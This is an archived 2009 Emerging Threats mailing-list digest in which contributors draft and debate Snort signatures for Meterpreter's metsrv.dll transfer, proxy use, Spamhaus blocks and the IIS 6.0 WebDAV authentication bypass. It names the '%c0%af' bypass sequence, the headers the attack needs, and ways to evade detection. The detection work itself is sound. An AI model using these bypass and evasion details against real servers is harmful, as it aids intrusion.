-  

-=[ dxp ]=-
0xA3F3C6E3



On Mon, 2009-05-18 at 20:41 +0000, ccentore at comcast.net wrote:
> This rule detects the transfer of the metsrv.dll file. It somewhat
> overlaps with rule 200419 / "ET POLICY PE EXE or DLL Windows file
> download", but I thought it might be a decent inclusion since, once
> downloaded, the metsrv.dll typically stays in memory and can be
> difficult to find if you don't know you are looking for it.
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Meterpreter
> metsrv.dll downloaded"; flow: established; content:"|DB 39 45 FC 0F 94
> C0 89 45 FC D1 E9 85|"; classtype:xxxxx;
> reference:url,www.metasploit.com/documents/meterpreter.pdf; sid:
> xxxxx; rev:1;)
> 
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090518/fdfdce25/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090518/fdfdce25/attachment.bin

From phatbuckett at gmail.com  Mon May 18 18:02:49 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Mon, 18 May 2009 15:02:49 -0700
Subject: [Emerging-Sigs] Metasploit's Meterpreter detection
In-Reply-To: <1242680123.6901.11.camel@kinta>
References: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net>
	<1242680123.6901.11.camel@kinta>
Message-ID: <839aec700905181502q2b78f39fge53682e3cf8f031e@mail.gmail.com>

Interested also to know if the any/any port spec can be narrowed with
some modifiers on the content check. I'm supposing not. :)

DS

On Mon, May 18, 2009 at 1:55 PM, dxp <dxp2532 at gmail.com> wrote:
> It's a very good idea.? It's definitely worth knowing what was thrown at
> you.
> Have you tested this for False Positives?? What specifically those bytes
> represent from the DLL?
>
> -
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
>
>
> On Mon, 2009-05-18 at 20:41 +0000, ccentore at comcast.net wrote:
>
> This rule detects the transfer of the metsrv.dll file. It somewhat overlaps
> with rule 200419 / "ET POLICY PE EXE or DLL Windows file download", but I
> thought it might be a decent inclusion since, once downloaded, the
> metsrv.dll typically stays in memory and can be difficult to find if you
> don't know you are looking for it.
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Meterpreter metsrv.dll
> downloaded"; flow: established; content:"|DB 39 45 FC 0F 94 C0 89 45 FC D1
> E9 85|"; classtype:xxxxx;
> reference:url,www.metasploit.com/documents/meterpreter.pdf; sid: xxxxx;
> rev:1;)
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>



-- 
Darren Spruell
phatbuckett at gmail.com

From r.fulton at auckland.ac.nz  Mon May 18 18:34:27 2009
From: r.fulton at auckland.ac.nz (Russell Fulton)
Date: Tue, 19 May 2009 10:34:27 +1200
Subject: [Emerging-Sigs] reference for sid:2008134
Message-ID: <F76535BB-0C51-4A2D-9999-CAB9CE31C7B3@auckland.ac.nz>

reference:url,http://www.threatexpert.com/report.aspx?md5=ea70e0971cc490a15e53d24ad6564403

I've added it to the wiki. might be worth adding to the rule.  ULR and  
site match exactly...

Russell

From jules at visionintel.com  Mon May 18 19:35:18 2009
From: jules at visionintel.com (Jules Pagna Disso)
Date: Tue, 19 May 2009 00:35:18 +0100
Subject: [Emerging-Sigs] proxy
Message-ID: <69544300905181635m74ff68efqa7d50c243457684d@mail.gmail.com>

hi guys,

is there a way we can identify a traffic behind a proxy server ? / identify
that a proxy server is being used ?

I assume that someone is trying to bypass some restrictions of some sort.

do we have a rule for that? or no solution

thanks,
Jules
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090519/96cca567/attachment.html

From jpleger at gmail.com  Mon May 18 19:42:53 2009
From: jpleger at gmail.com (James Pleger)
Date: Mon, 18 May 2009 16:42:53 -0700
Subject: [Emerging-Sigs] proxy
In-Reply-To: <69544300905181635m74ff68efqa7d50c243457684d@mail.gmail.com>
References: <69544300905181635m74ff68efqa7d50c243457684d@mail.gmail.com>
Message-ID: <32EAA87D-21CF-4DB9-BE32-C2261249FE94@gmail.com>

The only thing that you can detect is by looking at the VIA and X- 
Forwarded-For headers, which typically indicate proxy activity. There  
are some other headers depending on the proxy but those are the most  
common. In regards to finding what is behind the proxy, that is going  
to be difficult unless they send the X-Forwarded-For headers.

There are some proxy blacklists which have lists of open proxies which  
might be useful for you(although i don't have the urls you can google  
for them probably).

Regards,

James Pleger
e: jpleger at gmail.com
g: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9




On May 18, 2009, at 4:35 PM, Jules Pagna Disso wrote:

> hi guys,
>
> is there a way we can identify a traffic behind a proxy server ? /  
> identify that a proxy server is being used ?
>
> I assume that someone is trying to bypass some restrictions of some  
> sort.
>
> do we have a rule for that? or no solution
>
> thanks,
> Jules
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090518/260edfaa/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: PGP.sig
Type: application/pgp-signature
Size: 194 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090518/260edfaa/PGP.bin

From jpleger at gmail.com  Mon May 18 19:46:07 2009
From: jpleger at gmail.com (James Pleger)
Date: Mon, 18 May 2009 16:46:07 -0700
Subject: [Emerging-Sigs] proxy
In-Reply-To: <32EAA87D-21CF-4DB9-BE32-C2261249FE94@gmail.com>
References: <69544300905181635m74ff68efqa7d50c243457684d@mail.gmail.com>
	<32EAA87D-21CF-4DB9-BE32-C2261249FE94@gmail.com>
Message-ID: <9EF96076-99F8-421D-8BB1-67E2D9742517@gmail.com>

I also forgot to add that the signatures that are in the ET rulesets  
are mostly for detecting outbound proxy connections from your network  
to an external box which could indicate that a client on your host is  
doing naughty things.

Regards,

James Pleger
e: jpleger at gmail.com
g: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9




On May 18, 2009, at 4:42 PM, James Pleger wrote:

> The only thing that you can detect is by looking at the VIA and X- 
> Forwarded-For headers, which typically indicate proxy activity.  
> There are some other headers depending on the proxy but those are  
> the most common. In regards to finding what is behind the proxy,  
> that is going to be difficult unless they send the X-Forwarded-For  
> headers.
>
> There are some proxy blacklists which have lists of open proxies  
> which might be useful for you(although i don't have the urls you can  
> google for them probably).
>
> Regards,
>
> James Pleger
> e: jpleger at gmail.com
> g: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9
>
>
>
>
> On May 18, 2009, at 4:35 PM, Jules Pagna Disso wrote:
>
>> hi guys,
>>
>> is there a way we can identify a traffic behind a proxy server ? /  
>> identify that a proxy server is being used ?
>>
>> I assume that someone is trying to bypass some restrictions of some  
>> sort.
>>
>> do we have a rule for that? or no solution
>>
>> thanks,
>> Jules
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090518/8d55b576/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: PGP.sig
Type: application/pgp-signature
Size: 194 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090518/8d55b576/PGP.bin

From spooker at gmail.com  Mon May 18 23:22:30 2009
From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR))
Date: Tue, 19 May 2009 00:22:30 -0300
Subject: [Emerging-Sigs] proxy
In-Reply-To: <9EF96076-99F8-421D-8BB1-67E2D9742517@gmail.com>
References: <69544300905181635m74ff68efqa7d50c243457684d@mail.gmail.com> 
	<32EAA87D-21CF-4DB9-BE32-C2261249FE94@gmail.com>
	<9EF96076-99F8-421D-8BB1-67E2D9742517@gmail.com>
Message-ID: <9255886c0905182022q702fc7ecs7e2aa6655d48953b@mail.gmail.com>

snort http_inspect preprocessor has a feature

proxy_alert

This enables global alerting on HTTP server proxy usage. By
configuring HTTP Inspect servers and enabling allow_proxy_use, you
will only receive proxy use alerts for web users that aren't using the
configured proxies or are using a rogue proxy server.

Please note that if users aren't required to configure web proxy use,
then you may get a lot of proxy alerts. So, please only use this
feature with traditional proxy environments. Blind firewall proxies
don't count.

http://www.snort.org/docs/snort_htmanuals/htmanual_284/node78.html

Hope it helps.

Regards,

On Mon, May 18, 2009 at 8:46 PM, James Pleger <jpleger at gmail.com> wrote:
>
> I also forgot to add that the signatures that are in the ET rulesets are mostly for detecting outbound proxy connections from your network to an external box which could indicate that a client on your host is doing naughty?things.
>
> Regards,
> James Pleger
> e: jpleger at gmail.com
> g:?http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9
>
>
>
> On May 18, 2009, at 4:42 PM, James Pleger wrote:
>
> The only thing that you can detect is by looking at the VIA and X-Forwarded-For headers, which typically indicate proxy activity. There are some other headers depending on the proxy but those are the most common. In regards to finding what is behind the proxy, that is going to be difficult unless they send the X-Forwarded-For headers.
> There are some proxy blacklists which have lists of open proxies which might be useful for you(although i don't have the urls you can google for them probably).
>
> Regards,
> James Pleger
> e: jpleger at gmail.com
> g:?http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9
>
>
>
> On May 18, 2009, at 4:35 PM, Jules Pagna Disso wrote:
>
> hi guys,
>
> is there a way we can identify a traffic behind a proxy server ? / identify that a proxy server is being used ?
>
> I assume that someone is trying to bypass some restrictions of some sort.
>
> do we have a rule for that? or no solution
>
> thanks,
> Jules
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



--
===========================
Rodrigo Montoro (Sp0oKeR)
http://www.spooker.com.br
http://www.snort.org.br
http://www.linkedin.com/in/spooker
===========================

From shirkdog_list at hotmail.com  Mon May 18 23:32:21 2009
From: shirkdog_list at hotmail.com (Shirk Dog)
Date: Mon, 18 May 2009 23:32:21 -0400
Subject: [Emerging-Sigs] Metasploit's Meterpreter detection
In-Reply-To: <839aec700905181502q2b78f39fge53682e3cf8f031e@mail.gmail.com>
References: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net>
	<1242680123.6901.11.camel@kinta> 
	<839aec700905181502q2b78f39fge53682e3cf8f031e@mail.gmail.com>
Message-ID: <BAY109-W41AD0E8E51D79B4A4E3E6955B0@phx.gbl>


Well I was working on a FULL list of all of the Meterpreter commands, as they are static for now. The signatures were going to follow when I was done, about 20 of them. 


Shirkdog
Free your mind...
http://www.shirkdog.us



> Date: Mon, 18 May 2009 15:02:49 -0700
> From: phatbuckett at gmail.com
> To: dxp2532 at gmail.com
> CC: emerging-sigs at emergingthreats.net
> Subject: Re: [Emerging-Sigs] Metasploit's Meterpreter detection
> 
> Interested also to know if the any/any port spec can be narrowed with
> some modifiers on the content check. I'm supposing not. :)
> 
> DS
> 
> On Mon, May 18, 2009 at 1:55 PM, dxp <dxp2532 at gmail.com> wrote:
> > It's a very good idea.  It's definitely worth knowing what was thrown at
> > you.
> > Have you tested this for False Positives?  What specifically those bytes
> > represent from the DLL?
> >
> > -
> >
> > -=[ dxp ]=-
> > 0xA3F3C6E3
> >
> >
> >
> > On Mon, 2009-05-18 at 20:41 +0000, ccentore at comcast.net wrote:
> >
> > This rule detects the transfer of the metsrv.dll file. It somewhat overlaps
> > with rule 200419 / "ET POLICY PE EXE or DLL Windows file download", but I
> > thought it might be a decent inclusion since, once downloaded, the
> > metsrv.dll typically stays in memory and can be difficult to find if you
> > don't know you are looking for it.
> >
> > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Meterpreter metsrv.dll
> > downloaded"; flow: established; content:"|DB 39 45 FC 0F 94 C0 89 45 FC D1
> > E9 85|"; classtype:xxxxx;
> > reference:url,www.metasploit.com/documents/meterpreter.pdf; sid: xxxxx;
> > rev:1;)
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
> >
> 
> 
> 
> -- 
> Darren Spruell
> phatbuckett at gmail.com
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

_________________________________________________________________
Windows Live?: Keep your life in sync.
http://windowslive.com/explore?ocid=TXT_TAGLM_BR_life_in_synch_052009
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090518/872d73dd/attachment.html

From ccentore at comcast.net  Tue May 19 10:29:56 2009
From: ccentore at comcast.net (ccentore@comcast.net)
Date: Tue, 19 May 2009 14:29:56 +0000 (UTC)
Subject: [Emerging-Sigs] Metasploit's Meterpreter detection
In-Reply-To: <1242680123.6901.11.camel@kinta>
Message-ID: <1564217799.11251261242743396703.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net>

Ok, here is the disassembled output of the content string: 

0000621D DB39 FSTP TBYTE PTR DS:[ECX] 
0000621F 45 INC EBP 
00006220 FC CLD 
00006221 0F94C0 SETE AL 
00006224 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 
00006227 D1E9 SHR ECX,1 
00006229 85C9 TEST ECX,ECX 


It is non-repeating in the dll and I have not been able to find the pattern in other dll's that I have tested. I wish I knew what compiler was used to create it, then maybe I could could decompile it to maybe find something more unique. If you have any suggestions on how to look for a pattern, that would be great. 

-Chris 


----- Original Message ----- 
From: "dxp" <dxp2532 at gmail.com> 
To: ccentore at comcast.net 
Cc: emerging-sigs at emergingthreats.net 
Sent: Monday, May 18, 2009 3:55:23 PM GMT -06:00 US/Canada Central 
Subject: Re: [Emerging-Sigs] Metasploit's Meterpreter detection 

It's a very good idea. It's definitely worth knowing what was thrown at you. 
Have you tested this for False Positives? What specifically those bytes represent from the DLL? 
	-  

-=[ dxp ]=-
0xA3F3C6E3 

On Mon, 2009-05-18 at 20:41 +0000, ccentore at comcast.net wrote: 

This rule detects the transfer of the metsrv.dll file. It somewhat overlaps with rule 200419 / "ET POLICY PE EXE or DLL Windows file download", but I thought it might be a decent inclusion since, once downloaded, the metsrv.dll typically stays in memory and can be difficult to find if you don't know you are looking for it. 

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Meterpreter metsrv.dll downloaded"; flow: established; content:"|DB 39 45 FC 0F 94 C0 89 45 FC D1 E9 85|"; classtype:xxxxx; reference:url,www.metasploit.com/documents/meterpreter.pdf; sid: xxxxx; rev:1;) 



_______________________________________________
Emerging-sigs mailing list Emerging-sigs at emergingthreats.net http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090519/87ab7fab/attachment.html

From David.R.Wharton at regions.com  Tue May 19 10:32:53 2009
From: David.R.Wharton at regions.com (David.R.Wharton@regions.com)
Date: Tue, 19 May 2009 09:32:53 -0500
Subject: [Emerging-Sigs] proxy
In-Reply-To: <9EF96076-99F8-421D-8BB1-67E2D9742517@gmail.com>
Message-ID: <OF03058DC0.D92F1081-ON862575BB.004D8051-862575BB.004FEA73@corp.rgbk.com>

While not perfect, you could flag on an absoluteURI in a HTTP request:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY Proxy 
Usage Detected"; flow:established,to_server; uricontent:"http"; nocase; 
pcre:"/^(OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT)\shttps?://.*\sHTTP/1\.[01]\x0D\x0A/i"; 
classtype:policy-violation; sid:xxxxxx; rev:1;)

-David Wharton




James Pleger <jpleger at gmail.com> 
Sent by: emerging-sigs-bounces at emergingthreats.net
05/18/2009 06:46 PM

To
James Pleger <jpleger at gmail.com>
cc
Emerging-sigs at emergingthreats.net
Subject
Re: [Emerging-Sigs] proxy






I also forgot to add that the signatures that are in the ET rulesets are 
mostly for detecting outbound proxy connections from your network to an 
external box which could indicate that a client on your host is doing 
naughty things.

Regards,

James Pleger
e: jpleger at gmail.com
g: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9




On May 18, 2009, at 4:42 PM, James Pleger wrote:

The only thing that you can detect is by looking at the VIA and 
X-Forwarded-For headers, which typically indicate proxy activity. There 
are some other headers depending on the proxy but those are the most 
common. In regards to finding what is behind the proxy, that is going to 
be difficult unless they send the X-Forwarded-For headers.

There are some proxy blacklists which have lists of open proxies which 
might be useful for you(although i don't have the urls you can google for 
them probably).

Regards,

James Pleger
e: jpleger at gmail.com
g: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9




On May 18, 2009, at 4:35 PM, Jules Pagna Disso wrote:

hi guys, 

is there a way we can identify a traffic behind a proxy server ? / 
identify that a proxy server is being used ? 

I assume that someone is trying to bypass some restrictions of some sort. 

do we have a rule for that? or no solution

thanks,
Jules
_______________________________________________
Emerging-sigs mailing list
Emerging-sigs at emergingthreats.net
http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

_______________________________________________
Emerging-sigs mailing list
Emerging-sigs at emergingthreats.net
http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-------------- next part --------------
A non-text attachment was scrubbed...
Name: PGP.sig
Type: application/octet-stream
Size: 201 bytes
Desc: not available
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090519/fe58a868/PGP.obj

From juanma at ossim.net  Tue May 19 10:36:42 2009
From: juanma at ossim.net (Juan Manuel Lorenzo)
Date: Tue, 19 May 2009 16:36:42 +0200
Subject: [Emerging-Sigs] IP address on Spamhaus (Spam BlackList)
In-Reply-To: <53834cf20905040755i1686ab10qd328d057957f089@mail.gmail.com>
References: <53834cf20905040755i1686ab10qd328d057957f089@mail.gmail.com>
Message-ID: <bc8fdf040905190736q446ed69ao81d72188aa7d7b4@mail.gmail.com>

This rule is beeing quite usefull for us in some environments, when one
machine has been infected by any malware and it starts sending spam, in just
a few minutes we see that the ip adress has been blocked in spamhaus.

Juan Manuel Lorenzo

On Mon, May 4, 2009 at 4:55 PM, Jaime Blasco <jaime.blasco at alienvault.com>wrote:

> Hi!
>
> I've been analyzing some spam traffic, related to snort's rule:
> policy.rules:alert tcp $SMTP_SERVERS 25 -> $EXTERNAL_NET any (msg:"POLICY
> SMTP relaying denied"; flow:established,from_server; content:"550 5.7.1";
> depth:70; reference:arachnids,249; reference:url,
> mail-abuse.org/tsi/ar-fix.html; classtype:misc-activity; sid:567; rev:11;)
>
> we could write a rule to detect smtp responses like this:
> 553 Mail from *.*.* not allowed - 5.7.1 [BL23] Connections not accepted
> from IP addresses on Spamhaus XBL; see
> http://postmaster.yahoo.com/550-bl23.html [550]
>
> alert tcp $EXTERNAL_NET 25 -> $HOME_NET any (msg:"ET POLICY IP address
> BlackListed (Spamhaus)"; flow:established,from_server; content:"553 Mail
> from"; content:"Spamhaus XBL"; classtype:misc-activity; sid:; rev:1;)
>
> Regards
>
> --
> _______________________________
>
> Jaime Blasco
>
> www.ossim.com
> www.alienvault.com
> Email: jaime.blasco at alienvault.com
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090519/f8c7efb8/attachment.html

From jgimer at gmail.com  Tue May 19 11:54:35 2009
From: jgimer at gmail.com (Joshua Gimer)
Date: Tue, 19 May 2009 09:54:35 -0600
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242536118.7390.20.camel@kinta>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<1242536118.7390.20.camel@kinta>
Message-ID: <cf939bff0905190854n30aa76c3o8d3da2dc1da87a92@mail.gmail.com>

Translate: f is required when performing the GET method of attack, it
is NOT required when using the PROPFIND method.

On Sat, May 16, 2009 at 10:55 PM, dxp <dxp2532 at gmail.com> wrote:
> The text by Kingcope on milw0rm does specify the "translage: f" header in
> the first two examples.? I have not tested this but it appears, if I read
> the advisory correctly, that this additional header is required to exploit
> the vulnerability.? Without it the signature would pick up on many different
> web scans and woulld not be specific to this vulnerability.
>
> -
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
>
>
> On Sat, 2009-05-16 at 17:13 -0400, Nick Randolph wrote:
>
> I'm submitting this for the recent IIS 6.0 vulnerability
> http://isc.sans.org/diary.html?storyid=6397
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
> sid:xxxxxx; gid:1; rev:1;)
>
> I also read that "translate: f" was required but the information on
> milw0rm.com did not use that in all 3 examples.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>



-- 
Thx
Joshua Gimer

From frank at knobbe.us  Tue May 19 15:32:13 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Tue, 19 May 2009 14:32:13 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <9255886c0905180901u6abd75abh945c5b281ea08278@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<df9074860905180746h3cfe2590h34e99a9557b9201d@mail.gmail.com>
	<d48bb4250905180811p647b50f0r4f54135a4d506c5f@mail.gmail.com>
	<9255886c0905180901u6abd75abh945c5b281ea08278@mail.gmail.com>
Message-ID: <1242761533.4200.4.camel@localhost>

On Mon, 2009-05-18 at 13:01 -0300, Rodrigo Montoro(Sp0oKeR) wrote:
> http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html

So is %c0%af the only 16 bit Unicode sequence resulting in a "/"? (i
doubt it). Is this an issue with Unicode encoding in general or "%c0%af"
in particular? 

Cheers,
Frank


-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090519/c0ea24fb/attachment.bin

From jonkman at jonkmans.com  Tue May 19 15:35:45 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 19 May 2009 15:35:45 -0400
Subject: [Emerging-Sigs] Metasploit's Meterpreter detection
In-Reply-To: <BAY109-W41AD0E8E51D79B4A4E3E6955B0@phx.gbl>
References: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net>	<1242680123.6901.11.camel@kinta>
	<839aec700905181502q2b78f39fge53682e3cf8f031e@mail.gmail.com>
	<BAY109-W41AD0E8E51D79B4A4E3E6955B0@phx.gbl>
Message-ID: <4A130A11.9030601@jonkmans.com>

You want me to post this one now, or wait for the full list Shirk?

Thanks, great idea!

Matt

Shirk Dog wrote:
> Well I was working on a FULL list of all of the Meterpreter commands, as
> they are static for now. The signatures were going to follow when I was
> done, about 20 of them.
> 
> 
> Shirkdog
> Free your mind...
> http://www.shirkdog.us
> 
> 
> 
>> Date: Mon, 18 May 2009 15:02:49 -0700
>> From: phatbuckett at gmail.com
>> To: dxp2532 at gmail.com
>> CC: emerging-sigs at emergingthreats.net
>> Subject: Re: [Emerging-Sigs] Metasploit's Meterpreter detection
>>
>> Interested also to know if the any/any port spec can be narrowed with
>> some modifiers on the content check. I'm supposing not. :)
>>
>> DS
>>
>> On Mon, May 18, 2009 at 1:55 PM, dxp <dxp2532 at gmail.com> wrote:
>> > It's a very good idea.  It's definitely worth knowing what was thrown at
>> > you.
>> > Have you tested this for False Positives?  What specifically those bytes
>> > represent from the DLL?
>> >
>> > -
>> >
>> > -=[ dxp ]=-
>> > 0xA3F3C6E3
>> >
>> >
>> >
>> > On Mon, 2009-05-18 at 20:41 +0000, ccentore at comcast.net wrote:
>> >
>> > This rule detects the transfer of the metsrv.dll file. It somewhat
> overlaps
>> > with rule 200419 / "ET POLICY PE EXE or DLL Windows file download",
> but I
>> > thought it might be a decent inclusion since, once downloaded, the
>> > metsrv.dll typically stays in memory and can be difficult to find if you
>> > don't know you are looking for it.
>> >
>> > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Meterpreter
> metsrv.dll
>> > downloaded"; flow: established; content:"|DB 39 45 FC 0F 94 C0 89 45
> FC D1
>> > E9 85|"; classtype:xxxxx;
>> > reference:url,www.metasploit.com/documents/meterpreter.pdf; sid: xxxxx;
>> > rev:1;)
>> >
>> > _______________________________________________
>> > Emerging-sigs mailing list
>> > Emerging-sigs at emergingthreats.net
>> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>> >
>> > _______________________________________________
>> > Emerging-sigs mailing list
>> > Emerging-sigs at emergingthreats.net
>> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>> >
>> >
>>
>>
>>
>> --
>> Darren Spruell
>> phatbuckett at gmail.com
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 
> ------------------------------------------------------------------------
> Windows Live?: Keep your life in sync. Check it out.
> <http://windowslive.com/explore?ocid=TXT_TAGLM_BR_life_in_synch_052009>
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From jonkman at jonkmans.com  Tue May 19 15:37:55 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 19 May 2009 15:37:55 -0400
Subject: [Emerging-Sigs] reference for sid:2008134
In-Reply-To: <F76535BB-0C51-4A2D-9999-CAB9CE31C7B3@auckland.ac.nz>
References: <F76535BB-0C51-4A2D-9999-CAB9CE31C7B3@auckland.ac.nz>
Message-ID: <4A130A93.1050702@jonkmans.com>

Got it, thanks Russell!

matt

Russell Fulton wrote:
> reference:url,http://www.threatexpert.com/report.aspx?md5=ea70e0971cc490a15e53d24ad6564403
> 
> I've added it to the wiki. might be worth adding to the rule.  ULR and  
> site match exactly...
> 
> Russell
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From frank at knobbe.us  Tue May 19 15:40:18 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Tue, 19 May 2009 14:40:18 -0500
Subject: [Emerging-Sigs] Metasploit's Meterpreter detection
In-Reply-To: <4A130A11.9030601@jonkmans.com>
References: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net>
	<1242680123.6901.11.camel@kinta>
	<839aec700905181502q2b78f39fge53682e3cf8f031e@mail.gmail.com>
	<BAY109-W41AD0E8E51D79B4A4E3E6955B0@phx.gbl>
	<4A130A11.9030601@jonkmans.com>
Message-ID: <1242762018.4200.6.camel@localhost>

On Tue, 2009-05-19 at 15:35 -0400, Matt Jonkman wrote:
> You want me to post this one now, or wait for the full list Shirk?

I'd say let's wait for the full list. It's likely only be useful for SMB
based transfer of the code. Pretty much anyone would use evasion
techniques, like gzip'ed HTTP (or SSL) anyway. HTTP is easy to evade
while there are probably less possibilities with SMB.

-Frank



-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090519/ba704be3/attachment.bin

From frank at knobbe.us  Tue May 19 15:41:17 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Tue, 19 May 2009 14:41:17 -0500
